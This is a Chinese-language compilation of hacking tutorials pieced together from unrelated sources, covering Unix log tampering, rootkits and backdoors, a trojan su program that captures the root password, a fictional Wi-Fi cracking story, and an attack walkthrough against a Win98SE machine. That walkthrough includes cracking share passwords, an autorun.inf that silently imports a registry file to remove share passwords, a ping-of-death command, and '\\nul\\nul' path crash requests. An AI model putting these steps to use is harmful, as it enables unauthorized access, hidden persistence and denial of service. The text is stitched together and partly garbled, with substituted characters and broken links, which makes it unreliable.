UUCP体系妄图进入限制规模的事例.sulog记载应用su敕令的记载.utmp记载当前登录到体系中的所有效户,这个文件陪同着用户进入和分开体系而不竭变更.Utmpx,utmp的扩大.wtmp记载用户登录和退出事宜.Syslog最重要的日记文件,应用syslogd守护程序来获得.2.隐蔽踪影进击者在获得体系最高治理员权限之后就可以随便修正体系上的文件了(只对通例 Unix体系而言),包含日记文件,所以一般黑客想要隐蔽本身的踪影的话,就会对日记进行修正.最简略的办法当然就是删除日记文件了,但如许做固然防止了体系治理员依据IP追踪到本身,但也明白无误地告知了治理员,体系己经被人侵了.所以最经常应用的办法是只对日记文件中有关本身的那一部分做修正.关于修正办法的具体细节依据不合的操纵体系有所差别,收集上有很多此类功效的程序,例如 zap. wipe等,其重要做法就是消除 stlog和 Pacct等日记文件中某一用户的信息,使得当应用st等敕令检讨日记文件时,隐蔽失落此用户的信息.治理员想要防止日记体系被黑客修正,应当采纳必定的措施,例如用打印机及时记载收集日记信息.但如许做也有弊病,黑客一旦懂得到你的做法就会不断地向日记里写入无用的信息,使得打印机不断地打印日记,直到所有的纸用光为止.所以比较好的防止日记被修正的办法是把所有日记文件发送到一台比较安然的主机上,即应用loghost.即使是如许也不克不及完整防止日记被修正的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost.只修正日记是不敷的,因为百密必有一漏,即使自以为修正了所有的日记,仍然会留下一些蛛丝马迹的.例如装配了某些后门程序,运行后也可能被治理员发明.所以,黑客高手可以经由过程调换一些体系程序的办法来进一步隐蔽踪影.这种用来调换正常体系程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较罕有的有LinuxRootKit,如今已经成长到了5.0版本了.它可以调换体系的stat.inetd等等一系列重要的体系程序,当调换了ls后,就可以隐蔽指定的文件,使得治理员在应用ls敕令时无法看到这些文件,从而达到隐蔽本身的目标.3.后门一般黑客都邑在攻入体系后不只一次地进入该体系.为了下次再进入体系时便利一点,黑客会留下一个后门,特洛伊木马就是后门的最好典范.Unix中留后门的办法有很多种,下面介绍几种罕有的后门,供收集治理员参考防备.<1>暗码破解后门这是入侵者应用的最早也是最老的办法,它不但可以获得对Unix机械的拜访,并且可以经由过程破解暗码制作后门.这就是破解口令单薄的帐号.今后即使治理员封了入侵者的当前帐号,这些新的帐号仍然可能是从新侵入的后门.多半情形下,入侵者查找口令单薄的未应用帐号,然后将口令改的难些.当治理员查找口令单薄的帐号是,也不会发明这些暗码已修正的帐号.因而治理员很难肯定查封哪个帐号.<2>Rhosts + + 后门在连网的Unix机械中,象Rsh和Rlogin如许的办事是基于rhosts文件里的主机名应用简单的认证办法.用户可以随便马虎的转变设置而不需口令就能进入. 入侵者只要向可以拜访的某用户的rhosts文件中输入"+ +",就可以许可任何人从任何地方无须口令便能进入这个帐号.特殊当home目次经由过程NFS向外共享时,入侵者更热中于此.这些帐号也成了入侵者再次侵入的后门.很多人更爱好应用Rsh,因为它平日缺乏日记才能. 很多治理员经常检讨 "+ +",所以入侵者现实上多设置来自网上的另一个帐号的主机名和用户名,从而不轻易被发明.<3>校验和及时光戳后门早期,很多入侵者用本身的trojan程序替代二进制文件.体系治理员便依附时光戳和系统校验和的程序分辩一个二进制文件是否已被转变,如Unix里的sum程序.入侵者又成长了使trojan文件和原文件时光戳同步的新技巧.它是如许实现的: 先将体系时钟拨回到原文件时光,然后调剂trojan文件的时光为体系时光.一旦二进制trojan文件与本来的准确同步,就可以把体系时光设回当前时光.Sum程序是基于CRC校验,很轻易骗过.入侵者设计出了可以将trojan的校验和调剂到原文件的校验和的程序.MD5是被大多半人推举的,MD5应用的算法今朝还没人能骗过.。
当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。
造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。
当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。
其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。
关于缓冲区溢出在后面用专门章节来作详细解释。
无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。
黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。
了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。
2.权限的扩大系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。
这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。
但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。
这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。
只有获得了最高的管理员权限之后,才可以做诸如网络监听、打扫痕迹之类的事情。
要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。
例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程序。
一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su变成root了。
攻击的善后工作1.日志系统简介如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。
转载⿊客是如何⿊到你⼿机的?绝对涨姿势,⼀位⿊客的Wi-Fi⼊侵实录!声明:这是⼀虚构的故事,因此对图⽚均进⾏了模糊化处理。
内容整理⾃⽹络!故事的主⼈公⼩⿊是⼀名从事IT相关⼯作的技术宅男。
五⼀长假来临,宅在家中的他相当⽆聊,打开⼿机上的Wi-Fi模块,发现附近有将近10个⽆线连接点,有⼏个信号强度还相当不错。
⼼想何不尝试看看能否攻破邻居家的⽹络呢?说⼲就⼲,他决定利⽤⾃⼰的知识储备进⾏⼀番尝试,于是故事就这样开始了。
第⼀步攻破Wi-Fi连接密码,实现蹭⽹【攻击过程】⼩⿊⽤⾃⼰运⾏Android系统的⼿机,搜索了附近⼴播了SSID的Wi-Fi连接点,计划选取了⼀个合适的攻击⽬标。
通过⼀款Wi-Fi信号分析软件,他发现邻居⼩⽩家的Tenda_XXXXX⽆线连接是⼀个理想的攻击对象:这个Wi-Fi连接的信号⾮常好,⽽且常年处于开机状态,显然是最优选之⼀。
⼀般为了防⽌被蹭⽹,个⼈⽤户都会给Wi-Fi设置⼀个连接密码。
常⽤的两种加密⽅式⼜分为WEP加密与WPA加密两种。
WEP 加密由于是⼀种静态加密⽅式,收发的包中就含有密码信息,因此可以⾮常容易地就直接破解密码,⽬前已经很少被使⽤。
⽽WPA加密相⽐之下则更为安全⼀些,由于采⽤了动态加密的⽅式,因此只能使⽤暴⼒破解的⽅式来攻克。
⼩⿊这次遇到的SSID是Tenda_XXXXX的Wi-Fi就是采⽤⽐较难以破解的WPA加密,虽然相⽐WEP,破解难度⾼了不少,但是⼩⿊并没有彻底绝望,因为对于 WPA加密⽅式的Wi-Fi连接,破解的成功率取决于密码的复杂度与⿊客⼿中的字典⼤⼩。
⼩⿊熟练地打开⼀款名为WiFi万能钥匙的应⽤,尝试对这个⽆线⽹络的密码进⾏简单的破解,想不到竟然⼀下⼦就成功了。
⼩⿊迫不及待地进⼊相关⽂件查看,发现密码是:111111。
WiFi万能钥匙这款应⽤的优点在于操作简便,需要的技术知识门槛低,但是缺点也⼗分明显:由于字典的容量⾮常有限,只能破解⾮常简单的⼀些密码。
菜鸟黑客教程(2)2009-09-08 16:46出处:中国IT实验室作者:佚名【我要评论】[导读]ZOV: 不好意思,前一篇文章一时兴起,罗嗦了不少原理和工具软件介绍方面的内容,好像已经忘记了本次只是要进行“简单任务”……ZOV: 不好意思,前一篇文章一时兴起,罗嗦了不少原理和工具软件介绍方面的内容,好像已经忘记了本次只是要进行“简单任务”……不过没有对攻击目标的彻底了解,想要瞬间突破防线也是可望不可及的,借用武侠小说中高人常说的一句话:“发起攻击最困难的并不在于采用什么样的招式,而是对目标的了解。
”oK,现在废话少说,和我一起去玩玩Jackeroo现在所用的win98SE。
不过想想面对的目标是一个win98SE,我却着实提不起什么兴趣来——对于本身网络功能极弱的win9x/Me类系统来说,除非我亲自走到Jackeroo的电脑前动手捣鼓它(那Win9x/Me 可就真的死定了),从远程网络上可以进行的攻击好像就只有文件共享、拒绝服务和放置木马了。
由于本人魅力不够,而且对于文件捆绑及压缩可执行文件等隐藏木马的手段极不擅长,因此这里也就不讨论有关木马的内容,不过Jackeroo还是会给大家一些防范木马入侵的常规建议。
Jackeroo: 首先需要声明的是——win98是我最不常用的操作系统,我使用操作系统频率从WinXP,Win2000、Redhat Linux、WinMe、Win98依次递减,不过为了满足zov的表现欲,我也就临时装了一个,看看他采用什么伎俩采搞定我……■文件共享攻击ZOV: 前面一篇文章已经介绍过使用扫描工具获取共享资源,现在就派上用场。
要知道在windows 9x/Me中,只要对方有共享资源,无论采用什么共享密码加密,我们都可以使用一些小工具在几分钟之内破解出来。
我已经用扫描工具搜索出Jacketoo有一个共享目录“A.TEST',先在“资源管理器”或者IE的“地址栏”中输入“\\IP地址\a.test\”,回车之后如果该共享目录没有设置密码就可以直接进入,否则会跳出要求输入密码的窗口。
不用泄气,我的武器还没有用上。
现在运行PQwak(这是个老牌的Win9x共享破解软件,网络上很多地方都可以下载,你只需要在搜索引擎中输入“pqwak”即可),在JP栏中输入Jackeroo的IP地址,Share栏中输入共享目录的名字,点击“Crack”按钮,你就会发现用户名和密码很快就显示在下面,这个Win9x/He的文件共享安全实在是太……我现在就可以用这个密码进入到Jackeroo的共享文件夹中去一览无遗了。
请注意,不要以为只是进入了对方的一个共享目录危害不大。
如果对方共享的是一个分区,同时还有写权限,那我还是很容易通过加载注册表项目以达到将对方所有分区都共享出来且不用密码就可以进入。
原理很简单,一般来说Win9x/Me都将各分区的用户名和密码保存在注册表的一系列项中:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Network\Lanman \C(最后一个字母是分区名称)也就是说如果我将其中的用户名和密码都清除,那么对方系统重新启动之后就可以不使用密码进入他的任何分区和目录了。
但是这个注册表的项目植入却有些麻烦,除了欺骗对方自己运行你所编写的注册表项目外,其实我们还有一个办法--不过前提是对方先前就有一个分区共享着,无论是否加密(即使已经加密,还是可以使用前面的办法破解进入),但必须可以写入文件。
现在准备两个文件,一个是注册表文件(这里假设文件名称是anykey.reg); 另一个是自动运行文件autorun.inf(这个文件的名字不能随意改变),内容只需要两行:[AutoRun]open=regedit /s anykey.reg其小的“/s”参数就是让注册表在导入时不提示任何信息。
将这两个文件放到对方任何分区的根目录。
那么对方系统重新启动之后,只要没有关闭驱动器的自动运行功能,注册表项会被自动合并,然后就可以到他的硬盘上出入如无人之境。
Jackeroo:我想Zov针对我的Win98采用的第一招肯定就是“共享密码”问题,Win9x共享资源是Win9x最致命且最容易受到攻击的漏洞。
众所周知在win9x中提供了三个直接访问远程系统的方式:文件和打印共享、拨号服务器和远程修改注册表。
作为远程访问注册表需要比较高级的设置,而且在外部网中很难实现,所以…黑客们在攻击个人用户的时候就首选了攻击Win9x文件和打印共享,通过特定的工具,客户端在不知道完整口令情况下仍然可以访问共享资源。
这是因为win9x的密码认证长度可以由客户端指定.所以如果你指定的密码长度是1,那么最多也就把所有的键盘字符都试一下,如果用工具的话,应该很快可以搞定……解决的方式有两种:(1)采用“用户级”共享不过这种方式需要局域网内部有一台专门的服务器,对于大多数的单机直接连接到互联网的用户来说是不合适的。
(2)为Windows打补丁Microsoft也发布了“共享漏洞”的补丁,下边是针对不同的操作系统的补丁地址,请选择下载:Microsoft WindOWS 95/download/win95/update/11958/w95/en-us-273991usa5.exeMicrosoft Windows98/98S/download/win98se/update/11958/w98/en-us/273991usa8.ex eMicrosoft WindowS M/download/winme/update/11958/winme/en-us/273991usam.exe如果你想要深入了解内情,也可以/technet/treeview/default.asp?url=/technet/security/bulletin/fq00-072.as p ,那里有比较详细的陈述。
■拒绝服务攻击ZOV: 前面的那些玩法很容易就被Jackeroo打消,难道win9x不用木马远程攻击就真那么憋气吗?我心一横,恶向胆边生——让他死机!我想大家应该都曾经咒骂过win9x的不稳定,现在我就人为的在远程让win9x在我的操控下蓝屏死机,方法有很多种,我们只列举最常用的方法:1.DoS攻击我们这里说的DoS可不是DOS,DoS是Denial of Service,从字面上来看,就知道是拒绝服务的意思,这一类的攻击开不是要在服务器上进行什么不法活动,而是耗尽系统的资源从而使其无法提供正常服务,想当年Yahoo 、eBay等就是倒在这种最原始但又最有威力的攻击之上的……这里边最有名的就是pins攻击,需要说明一点的是目前几乎没有什么地方使用这种攻击了,不过在它最早出现的时候,几乎所有的操作系统对它都束手无策,但是操作系统公司很快推出了补丁,所以到现在这种攻击已经没什么用武之地了。
不过现在发现的很多攻击技巧仍然有很多是应用这种方法而产生的。
我们知道ping是一种向主机回应请求(echo request)和接受回应应答(echo reply)的命令,通常这个数据包很小,但是在绝大多数的操作系统设计中,pins程序所包括的最大数据量是65507字节,问题就这样发生了。
如果使用windows发送65507字节的数据,因为数据太大无法一次传送,所以需要分成两个数据包来传送,但接收的时候需要将两个分割的数据包进行IP重组,由于很多操作系统无法应付65507字节以上的数据包,会出现溢出(overflow),系统死机或者出现蓝屏错误。
下边就用ping来测试一下Jackeroo的Win98SE系统的稳定性。
启动到LinUX操作系统下,输入ping -f -s 65000 Jackeroo,过不了多久Jackeroo就需要重新启动了……Jackeroo:Windows的Ping Of Death攻击首一度让我们办公室的兄弟们谈虎色变,不过现在他们都已经有了相应的解决办法,当然这个解决方案是微软提供/technet/security/bulletin/ms00-029.asp),对于不同的操作系统请打上相应的补丁:Win9/download/win95/update/8070/w95/en-us/259728usa5.exe Win9/download/win98/update/8070/w98/EN—US/259728isa8.exeWinNT 4.0 Workstation、Serve/downloads/release.asp?Releaseld=20829WinNT 4.0 Server、Terminal Serve/Downloads/Release.asp?Releaseld=20830Win2000 Professional、Server and Advanced Serve/downloads/Release.asp?ReleaselD=208272.设备名非法路径请求ZOV:win9x有一个致命的漏洞,如果没有打上相应的补丁,无论是远程还是本地,只要请求访问系统上一些包含设备名的非法路径,win9x的错误解析会造成内核的溢出而导致整个系统出错,这时只有重新启动系统才能恢复正常。
con、nul、aux,clock$、config$这些设备或设备驱动程序可以使系统崩溃(常用的一般是前面3个),我们可以把它们组合起来形成一个路径,例如:\con\con、\nul\nul、\aux\aux、\con\aux等等。
如果目标机器上存在共享,不管该共享资源有没有设置密码,都可以在命令行或者地址栏运行。
\\IP地址\共享资源名称\nul\nul”让对方的win9x系统崩溃(其中的“\nul\nul”也可以使前面提到的。
“\con\con”等路径)。
如果对方没有共享文件夹那么查看是否共享打印机,一旦有,那么同样可以运行“\\IP地址\printer$\nul\nul”达到使对方Win9x崩溃的效果。
原文出自【比特网】,转载请保留原文链接:/58/9151558.shtml。